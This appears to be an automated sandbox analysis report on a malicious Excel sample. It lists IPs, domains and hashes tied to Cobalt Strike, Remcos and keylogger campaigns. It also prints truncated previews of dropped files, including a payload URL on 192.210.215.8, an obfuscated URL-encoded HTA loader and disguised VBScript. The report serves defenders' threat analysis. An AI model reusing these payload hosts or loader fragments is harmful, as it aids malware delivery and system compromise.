                                                                                              192.210.215.8createdbestthingswithnewthingsgreatattitudewithnewthignsonherewithme.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                              • 192.210.215.8/680/newbetterthingscometobeonlinewithnewthings.tIF

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              u4u.kidsPO NAHK22012FA000000.docxGet hashmaliciousUnknownBrowse
                                                                                              • 24.199.88.84
                                                                                              PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                                                                                              • 24.199.88.84
                                                                                              Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                              • 24.199.88.84
                                                                                              Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 24.199.88.84
                                                                                              InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 24.199.88.84

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              TWC-12271-NYCUSla.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                              • 24.168.15.31
                                                                                              la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                              • 24.90.165.8
                                                                                              la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                              • 98.7.19.218
                                                                                              la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                              • 98.7.19.218
                                                                                              la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                              • 67.244.124.183
                                                                                              PO NAHK22012FA000000.docxGet hashmaliciousUnknownBrowse
                                                                                              • 24.199.88.84
                                                                                              PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                                                                                              • 24.199.88.84
                                                                                              Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                              • 24.199.88.84
                                                                                              Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 24.199.88.84
                                                                                              byte.mpsl.elfGet hashmaliciousOkiruBrowse
                                                                                              • 68.174.131.114
                                                                                              AS-COLOCROSSINGUS#PO247762.docxGet hashmaliciousRemcosBrowse
                                                                                              • 104.168.7.51
                                                                                              la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                              • 192.3.165.37
                                                                                              la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                              • 107.175.231.193
                                                                                              Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                              • 192.3.176.141
                                                                                              PRODUCT_INQUIRY.jsGet hashmaliciousWSHRatBrowse
                                                                                              • 192.210.215.11
                                                                                              Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 107.175.229.138
                                                                                              InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 172.245.123.45
                                                                                              seethebestthingstobegetmebackwithherlove.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                              • 23.94.171.157
                                                                                              necgoodthingswithgreatthingsentirethingstobeinonline.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                              • 107.173.4.9
                                                                                              nicworkgbeeterworkgoodthingswithgereatniceforme.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                                                              • 107.175.229.138

                                                                                              JA3 Fingerprints

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              05af1f5ca1b87cc9cc9b25185115607d#PO247762.docxGet hashmaliciousRemcosBrowse
                                                                                              • 142.250.186.97
                                                                                              • 216.58.212.174
                                                                                              PO NAHK22012FA000000.docxGet hashmaliciousUnknownBrowse
                                                                                              • 142.250.186.97
                                                                                              • 216.58.212.174
                                                                                              PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                                                                                              • 142.250.186.97
                                                                                              • 216.58.212.174
                                                                                              Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                              • 142.250.186.97
                                                                                              • 216.58.212.174
                                                                                              InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 142.250.186.97
                                                                                              • 216.58.212.174
                                                                                              CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 142.250.186.97
                                                                                              • 216.58.212.174
                                                                                              oodforme.docGet hashmaliciousRemcosBrowse
                                                                                              • 142.250.186.97
                                                                                              • 216.58.212.174
                                                                                              EX0096959.docx.docGet hashmaliciousRemcosBrowse
                                                                                              • 142.250.186.97
                                                                                              • 216.58.212.174
                                                                                              SGS-Report0201024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                              • 142.250.186.97
                                                                                              • 216.58.212.174
                                                                                              BA4M310209H14956.xlsGet hashmaliciousRemcosBrowse
                                                                                              • 142.250.186.97
                                                                                              • 216.58.212.174
                                                                                              7dcce5b76c8b17472d024758970a406b#PO247762.docxGet hashmaliciousRemcosBrowse
                                                                                              • 24.199.88.84
                                                                                              PO NAHK22012FA000000.docxGet hashmaliciousUnknownBrowse
                                                                                              • 24.199.88.84
                                                                                              PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                                                                                              • 24.199.88.84
                                                                                              Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                              • 24.199.88.84
                                                                                              Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 24.199.88.84
                                                                                              InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 24.199.88.84
                                                                                              EX0096959.docx.docGet hashmaliciousRemcosBrowse
                                                                                              • 24.199.88.84
                                                                                              Inv No.248730.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 24.199.88.84
                                                                                              Oct2024TU-580.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 24.199.88.84
                                                                                              Inv No.248730.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 24.199.88.84

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):4742
                                                                                              Entropy (8bit):4.8105940880640246
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
                                                                                              MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
                                                                                              SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
                                                                                              SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
                                                                                              SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
                                                                                              Malicious:false
                                                                                              Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):64
                                                                                              Entropy (8bit):0.34726597513537405
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Nlll:Nll
                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                              Malicious:false
                                                                                              Preview:@...e...........................................................

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\uwantskillthingstobegreatthingswitheveryonewithuthat[1].hta

                                                                                              Download File
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):133994
                                                                                              Entropy (8bit):2.149007711331083
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:Eam76DDqDh4t42wiBTPIsDkD6IN6Dx87T:Ea26DuDet4cPlDkD6m6DIT
                                                                                              MD5:6040C9C5025A690FC8A0965B17B7EEFF
                                                                                              SHA1:912C5740EB4187A719A6BE5891442C7EA83F9CF0
                                                                                              SHA-256:1F8934D51F9936ABA25181309C82EAB5EA4F3FDF263D727D17D021150A8A78CA
                                                                                              SHA-512:39917E620E9A4D408E104AF2B22601B25B78EE24478C39FDDB85D53D0F298BEA9757862DB17CD55BEA6814C0729CA7BF9DCF7CDC64E894E678D882D73831AAE9
                                                                                              Malicious:true
                                                                                              Preview:<script>.. ..document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CScRIPt%252520TYpE%25253D%252522tExT/VbsCrIPT%252522%25253E%25250AdIm%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\createdbestthingswithniceworkgreath[1].tiff

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):140578
                                                                                              Entropy (8bit):3.695250393374824
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:bybqHgt5pz6GwnGF5MogA+Z4Pcofy4jJBvs15tidfr4xvZU1uv/q:bybqgt5peGwFAPc8j/E154dfrcvZUaq
                                                                                              MD5:A662B24242684290B46777977F7FBFB7
                                                                                              SHA1:E4CB41E0206EEC554B60C131BA807C6DD0ADB3C1
                                                                                              SHA-256:BE2BF60EAE60DF6FC37A5BFC23BB5E8BAB48BA0664D990B545FD4BEA239AFA0F
                                                                                              SHA-512:27602CEFCC3D29DC8BC0886B2E6BB7CF7BDB75E3B1ED56AB1F1047D8E4D8F18EB4AFB04F9028A80642FA2C4F8DA62C178CDDA23C863C4D0CF5D7C6C50905185B
                                                                                              Malicious:false
                                                                                              Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .p.i.n.g.a.d.o.)..... . . . .d.i.m. .b.o.m.b.a.r.d.e.i.o.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .b.o.m.b.a.r.d.e.i.o..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .b.o.m.b.a.r.d.e.i.o.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... .

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\446ABDD0.emf

                                                                                              Download File
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                              Category:dropped
                                                                                              Size (bytes):1462180
                                                                                              Entropy (8bit):4.432116325040296
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:rQelSzQ4mD3f5ReZdZJElOFmxi9DrvwdkfDxdYJhvRJiTeJ78KJcj/iiDmdYJhkG:rVlS5mzCJEuPukZBV
                                                                                              MD5:C88BBA4F839966D6648736A889FC1572
                                                                                              SHA1:6BC7FD238EB8563236B3E0049CFA9849DFC7A71B
                                                                                              SHA-256:49497513E15B13BD704C26CBE555D5F0A68F77203C59E500025BBC719366296D
                                                                                              SHA-512:0149FB22DD6E3530EEE015A978E4D99C6DBE6FE70C508C6CCFF735B875B0DE97B06BD9878C9E871A3EFBF2429640329A9CD80DE790CB80CB8364700333D5A571
                                                                                              Malicious:false
                                                                                              Preview:....l...............2...........@m..?... EMF.....O...,..A...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\453C8E44.emf

                                                                                              Download File
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                              Category:dropped
                                                                                              Size (bytes):172076
                                                                                              Entropy (8bit):3.1342558498505824
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:7DqEuvAIid/aQGb1BfUErpxTORWEl+tIL22EZCd:iEuWd/adDrvTUP22Bd
                                                                                              MD5:D85DAC1376E45C58F790BD50C2729F6C
                                                                                              SHA1:5BD339C54A944689935652E4A1CC78961EB19589
                                                                                              SHA-256:CE5CF5334F2BF26B0B3F4B135B2BEA9126CB29DD1C5BED1F558FAA2BFE4C8E48
                                                                                              SHA-512:6B864B3E47331C5C37376B1F9ED7FE1F8D48BE27438DE9C4D7BA3B3ED6ED3F319425E8D696B51C7969AD3C10A7285D7212E59FDDAC8385BCD992A03EF189789A
                                                                                              Malicious:false
                                                                                              Preview:....l..............................eQ.. EMF....,.......$...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........T...)..............."...!..............?...........?................................'.......................%...................................&...........................%.......

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\86CC8246.emf

                                                                                              Download File
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                              Category:dropped
                                                                                              Size (bytes):1462180
                                                                                              Entropy (8bit):4.432116325040296
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:rQelSzQ4mD3f5ReZdZJElOFmxi9DrvwdkfDxdYJhvRJiTeJ78KJcj/iiDmdYJhkG:rVlS5mzCJEuPukZBV
                                                                                              MD5:C88BBA4F839966D6648736A889FC1572
                                                                                              SHA1:6BC7FD238EB8563236B3E0049CFA9849DFC7A71B
                                                                                              SHA-256:49497513E15B13BD704C26CBE555D5F0A68F77203C59E500025BBC719366296D
                                                                                              SHA-512:0149FB22DD6E3530EEE015A978E4D99C6DBE6FE70C508C6CCFF735B875B0DE97B06BD9878C9E871A3EFBF2429640329A9CD80DE790CB80CB8364700333D5A571
                                                                                              Malicious:false
                                                                                              Preview:....l...............2...........@m..?... EMF.....O...,..A...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89665175.emf

                                                                                              Download File
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                              Category:dropped
                                                                                              Size (bytes):38272
                                                                                              Entropy (8bit):2.8081661079517968
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:6/CJoV9KjGhFi1lildmP/4GtXULs9h2QmlC+a6gz5nCf5OBgJP+SKA:6/CbiG1l34GtXl2QmlC+a6gz5SOyJ1/
                                                                                              MD5:1ED1E7A0ED6137C48652115CA579221E
                                                                                              SHA1:B66C7110A3831166B32E3664AAF24AB75C0CCCA1
                                                                                              SHA-256:A694409B40BB7B2DFC78BE6C7ECDFC4F6A8B95305247EB520C57F9E0B1BBFDC3
                                                                                              SHA-512:93D917CEAD84FF6792723B2238A342F995A3AF8DD0003DA8298BB04F5A6D53F0C6EC7728D6EE51933BEBA015969EAD8C25F8566E6DC2CEE4EBF931F2422F25AE
                                                                                              Malicious:false
                                                                                              Preview:....l...........c................N...@.. EMF........l.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d.......'.......................%...........................................................L...d...........c...............d.......!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B313C0F2.emf

                                                                                              Download File
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                              Category:dropped
                                                                                              Size (bytes):349384
                                                                                              Entropy (8bit):3.7170605169628734
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:6dkVZD+Jb5qGYJ6OoG+RJ2dB9eJb85eKJBFgcxSoigiP/l5K:UkVZD+JbBYJhkRJiTeJI8KJcs/ibY
                                                                                              MD5:4491EFDD2921740B529E96BD780D0644
                                                                                              SHA1:A170615106A550A873E2FD78D913FA02264B1D19
                                                                                              SHA-256:2873A34503AFAFA73B48AB4C63CB00D14D209C24A704F6BBE92D5D9EA40BE538
                                                                                              SHA-512:FEFE0B18BD15EB774F42056EB9E39FD8BFF8DDEF76595E5EFEC9A76117D173513FFCFCF79A45ACDECD4F714DBC6E95EDB813AF610F19C96E1595D72DC7FDE707
                                                                                              Malicious:false
                                                                                              Preview:....l...........'....................S.. EMF.....T..S.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................(......."...........!...............................................(......."...........!...............................................(......."...........!...............................................(......."...........!...............................................(.......'.......................%...........................................................L...d...........=...............<.......!..............?...........?................................'......................%...........(......................L...d...........F...............G...

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D20818F.emf

                                                                                              Download File
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                              Category:dropped
                                                                                              Size (bytes):52712
                                                                                              Entropy (8bit):2.69601862257325
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:k37ZSy7s8wsI459Fwh+zRrXheOV8OV8OV1lJ//Te7rP:y7blMOV93WrP
                                                                                              MD5:57851611F066C7BD325A4B9817DD28B0
                                                                                              SHA1:A52AE733137921018D9670ABB919568CD5F90F2F
                                                                                              SHA-256:EE958A9DEF0CA8010229635A73E8F3621A234CAEE58EE7C6DF8CFE128490B139
                                                                                              SHA-512:A6B5D475F1247988B9139F2586D210FF0741203B398F7FB2CF8CB1C7C39250C52982954F81F576FF765E2561A3462078A173EA35749C1DDEF55FC99BD4918C85
                                                                                              Malicious:false
                                                                                              Preview:....l............................S...".. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.................P.....%.....................P.....................................L...d.......<.......m.......<.......2...!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................

                                                                                              C:\Users\user\AppData\Local\Temp\03ecrloa.zcf.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1

                                                                                              C:\Users\user\AppData\Local\Temp\1lyimdkn.ylr.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1

                                                                                              C:\Users\user\AppData\Local\Temp\2au03ooh.f5q.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1

                                                                                              C:\Users\user\AppData\Local\Temp\2vbtnlju.fgm.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1

                                                                                              C:\Users\user\AppData\Local\Temp\4hdq5exf.zjn.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1

                                                                                              C:\Users\user\AppData\Local\Temp\5pdyt2cm.w5s.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1

                                                                                              C:\Users\user\AppData\Local\Temp\RES955D.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 24 06:39:41 2024, 1st section name ".debug$S"
                                                                                              Category:dropped
                                                                                              Size (bytes):1328
                                                                                              Entropy (8bit):3.98449912131422
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:HUe9EurZ0dHGjwKdNWI+ycuZhNsRakS1WPNnqSqd:hriFKd41ulsRa31qqSK
                                                                                              MD5:57B22B1B6E256D2C227D8B5931AB78E5
                                                                                              SHA1:7DE9637545FEB85CB798C902CA4B89E3E05577F4
                                                                                              SHA-256:6B71803C3BAB951289EF085F5B4B2659006A1A26EACC3211B4A73318D29CC344
                                                                                              SHA-512:14CCFB41D710AAB67894CC9F411BE196676C3C4C41F64C216B44C03DBB219D60ADC1D44955DE65B79FE4552FD36401BBD0E5101CF541699ED479333C4DCBC557
                                                                                              Malicious:false
